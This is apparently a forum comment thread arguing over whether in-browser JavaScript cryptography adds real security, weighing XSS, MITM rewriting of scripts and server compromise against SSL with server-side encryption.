Could anyone explain what's the use case for encrypting text on a web page using JavaScript? I don't understand how this library is useful except for situation when used in Chrome extensions like the one used by LastPass.
If this lib is used on a page to decrypt/encrypt user data before sending to the server, theoretically it's possible for the host to steal private key simply by injecting a JS code that copies user's private key.
It's worse than that. Among many other things, it's possible for any attacker with an XSS bug in any component of the DOM of that page (cached or fetched fresh) to steal keys. Modern browsers provide no way to verify the whole JS runtime to ensure that no function that your crypto depends on has been backdoored, but every JS implementation allows functions to be overridden.
It's the worst possible environment to implement crypto in, and you should never do it.
XSS is in your own control (as a site owner/developer), and it is less likely to happen than the user machine being infested with malware to begin with. And the malware infestation threat has never stopped anyone from advocating native (non-browser) crypto, right?.
The difference between normal software and browser javascript is that browser javascript is effectively re-installed every time you visit a web page. People install new software packages less than once a week.
This is a nerdy argument I'm not particularly interested in hashing out again, so you're welcome to the last word.
Your argument here looks like, "other things have vulnerabilities, and JavaScript has vulnerabilities, so it is equivalent to other mechanisms."
If that is your argument, then the conclusion is wrong, because JavaScript implementations are vulnerable to everything that everything else is vulnerable to, and then some.
There is nothing that a JavaScript implementation actually protects you from.
That's not my argument at all. My argument is that the probability of a well-designed site having XSS (p1) is much less than that of a user's machine being infested (p2). When you start using both, as you say, we end up with compound probability of a breach p1+p2, which is strictly worse than p2, but if p1<<p2 we are not losing much to begin with, and it maybe justified if we're gaining as much or more elsewhere.
In other words, global optimization may require local pessimization.
E.g. if we gave the user ability to store secret data without the key ever leaving his possession, he might be more likely to use the service and stop storing his secrets in a notepad file. However if we don't guarantee that the key will not leave the user's possession, the user may decide not to use the service.
> ...and it maybe justified if we're gaining as much or more elsewhere.
Except that, in terms of real security, we aren't. That's the whole point. You're right in describing it in the way you did, but then you get to this point where there's this implicit assumption that JavaScript-based crypto gains you something. Which, maybe, leads into your next point...
> E.g. if we gave the user ability to store secret data without the key ever leaving his possession, he might be more likely to use the service and stop storing his secrets in a notepad file.
OK, but this is a different problem. The correct solution here is a true client-side app or a browser add-on (and even then ... ehhhh). Otherwise -- and this is a point that I don't feel like I can emphasize enough -- you are giving your users a completely false sense of security. You're selling a service by saying that "we'll store your secrets for you and you don't even have to ever give us your key, so it's more secure than keeping them in a notepad file", but that's demonstrably false.
> However if we don't guarantee that the key will not leave the user's possession, the user may decide not to use the service.
Also a different problem. You can't sell security this way. All you're doing is taking advantage of people's ignorance. If everybody understood the security risks of JavaScript-implemented crypto, and you sold the same service -- "we use JS so you never have to share your keys" -- then the users would decide not to use the service!
To reiterate:
1. Server-side encryption is a real protection from accidental or malicious data leaks (db dumps);
2. SSL is a real protection from MITM and eavesdropping (mostly, with caveats);
3. If the server software gets compromised, you're pooched no matter what.
So, again: JavaScript solves none of these problems.
The only thing that JavaScript does, is add more problems.
>You're selling a service by saying that "we'll store your secrets for you and you don't even have to ever give us your key, so it's more secure than keeping them in a notepad file", but that's demonstrably false.
Now, aren't you getting carried away? Physical loss of a laptop will compromise the notepad file, but not the client-side encrypted data. Malware on the laptop will compromise the notepad file 100%, but any crypto-based solution will only be compromised if it's been used during that time. Fire/flood/theft will deprive the user of his secrets altogether.
Seriously, are you claiming that a notepad file is more secure than a server-based storage with client or server encryption? That's an extraordinary claim.
1. That notepad file can be encrypted on the laptop; and
2. "Web app" programmers so often get security really wrong. This entire thread is just one of a huge number of examples of that.
Honestly, any hosted solution that relied on JS for encryption or authentication would encourage me to keep storing secrets in text files on my laptop.
Here's a fun, easy way to understand why hosted solutions are rarely a good idea for storing private data:
- Make a chart with four columns;
- Column 1 is "Unencrypted local storage"; column 2 is "encrypted local storage"; column 3 is "remote storage with JavaScript encryption"; column 4 is "remote storage with SSL + server-side encryption";
- Under each column, write down a list of every method you can think of that that particular system could be broken. Take your time and be creative.
- Cross out any methods that all of the columns have in common.
How is this any different from a XSS bug resulting in an attacker stealing the plaintext password from a form?
Also, given that the client and the server trust each other and communicate securely, doesn't this just get reduced to the probability of having these bugs and nothing more?
If the client and the server can trust each other, then JavaScript encryption literally adds no benefit.
Think of it this way: your browser contains some areas whose sole responsibility is to verify the authenticity of a remote server (SSL), and those areas are completely inaccessible from the DOM. So, basically, as long as you can trust your web browser, then you can trust the connection.
But those protections don't exist for JavaScript. An attacker could compromise your server, rewrite your JS, and you'd never notice. (No JS signing capabilities in the browser; no TOFU/POP style architecture.) An attacker could use an SQL injection on your CMS to leave a comment that uses XSS to modify your JS encryption while it's running, and you'd never notice. You could be on an unsecured network and someone could MITM rewrite your JavaScript in-flight, or, in the cases of bad JS crypto implementations (which almost every single one is), simply use a replay attack at their leisure.
There are all kinds of really neat ways to attack JavaScript.
It's true that there are also almost as many ways to attack any other authentication/encryption system, but the point with attacks against JavaScript is that JavaScript adds no extra security at all -- it is at least as vulnerable to any of these as anything else is -- and it adds a false sense of security, and it is vulnerable to things that SSL is not, and in some of the scenarios, you will get absolutely no indication that you've been compromised.
Suppose you want to store confidential data with the server. You trust the server owners to be the good guys, but you also know that data breaches happen (e.g. equipment theft, FBI seizures, backup tape leaks), so if/when the breach happens the thieves will have made off with encrypted copy of your data. The only way your data is jeopardized is one of the two cases:
1. The people maintaining the service turned out to be not trustworthy, and have been harvesting the keys all along.
2. The hackers took control of the server and injected code to harvest the encryption keys for long enough to catch you in the net.
If you look at the relative probabilities of these two events compared to a straight-up data leak, we're looking at orders of magnitude reduction in risk. Most people who did the right thing in the past are in the habit of doing the right things, so you can lean on the host's reputation - we've been doing that for thousands of years. Code injection on the site is much less likely than the data leak, and it is a lot less fruitful for the attacker as he would have to sit there undetected and wait for enough users to punch in their keys.
No, it doesn't. JS implementations suffer from all the same flaws that everything else does, plus a few more, and it offers no protection from any flaws that anything else is vulnerable to.
"You can never be completely secure" is not a good justification for security theatre.
Well not really, because if you can verify the scripts that are loaded (and side-loading JavaScript would have to be a targeted attack that compromised either the server, or the Google API, or a malicious extension), then it guarantees end-to-end encryption for the user as opposed to having to send plaintext over the wire.
How exactly would you implement a browser based crypto solution?
That, plus a notification to the user if the signed JS has changed since the last time it was loaded, with SHA hashes of the scripts (and other data) stored directly in the browser in a way not accessible from the DOM.
Since in-page scripts could still on-the-fly rewrite the functions of loaded JS, they would have to be provided read-only by the browser, or there would have to be some kind of out-of-DOM API for working with them.
My hope would be that we'd see a handful of signed libraries provided and reviewed by cryptographers and that they wouldn't change very often because it would be a pain in the ass when they did.
But: I am not a cryptographer or even a qualified security expert. There is probably a good reason not to do it this way.
How is this a justification for JavaScript crypto? It might be a justification for some form of crypto, but if that's the case, why not stick with SSL + server-side encryption?
Either will work for the given scenario. The only difference I see is that with client-side crypto you can't accidentally write the key into a server log file, where as with server-side crypto it is possible.
But then again at some point you will add some logging to client-side code as well, so the point will be moot - you will have to sanitize logs at point of production.
Another thing is that it makes much better messaging - "the encryption key never leaves your machine".
Why do you think the other method does not have the same weaknesses? If the browser is compromised the key that users enters into the web page is leaked, regardless of whether you use client-side or server-side crypto. The fact that in client-side crypto in addition to the encryption key the code itself could have been tampered does not add anything to the threat... does it? The key is already presumed to have been leaked, and things can not get any worse than that.
As far security is concerned, the two are equally (in)secure. And client-side crypto still has the advantage that key management is much easier to explain to the user, thus the app is more likely to be used.
> Why do you think the other method does not have the same weaknesses?
Trivially: JavaScript encryption is vulnerable to MITM attacks that SSL is not. The only solution to this is to deliver your JS over SSL, but browsers will complain if you try to mix https and non-https elements in a page, and you might as well serve the whole page over https anyway. If you do that, then you still don't need JavaScript. (As one example; I know there are others but I just came in from the yard and my brain is a little melty right now.)
> As far security is concerned, the two are equally (in)secure.
This is a statement which flies in the face of the recommendations of some very smart people in the security field, some of whom have written extensive posts which have been linked to in this thread.
Even if I didn't (barely) know enough to evaluate your claims on my own, I could conclude that you might be right ... but I wouldn't bet on it.
Look, this subject has been discussed to death and nauseum, including here on HN. There have been extensive essays written about it. If you don't want to believe me, I'm OK with that. Go read their stuff, and see if it makes more sense to you.
If, after reading all of that, you still think you have some new insight in the field that everyone else has overlooked, and you can show why JavaScript is "equally (in)secure" to SSL + server-side encryption, then make your own blog post or essay about it. Make it good and in-depth, link to it from HN, tell everyone about it. I'd be happy to read it.
Otherwise you and I are just going in circles and not getting anywhere.
Update:
I should probably note that I haven't looked at the implementation, and there's no way I'd do as I mention above without having complete control of sources.
If this lib is used on a page to decrypt/encrypt user data before sending to the server, theoretically it's possible for the host to steal private key simply by injecting a JS code that copies user's private key.